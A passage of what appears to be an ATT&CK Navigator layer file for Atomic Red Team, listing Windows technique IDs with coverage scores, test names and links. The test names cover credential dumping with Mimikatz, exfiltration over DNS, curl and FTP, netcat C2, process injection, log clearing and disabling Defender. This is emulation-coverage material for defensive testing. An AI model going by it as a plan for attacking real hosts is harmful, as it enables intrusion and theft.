Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Network-Based Data Transfer in Small Chunks\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View 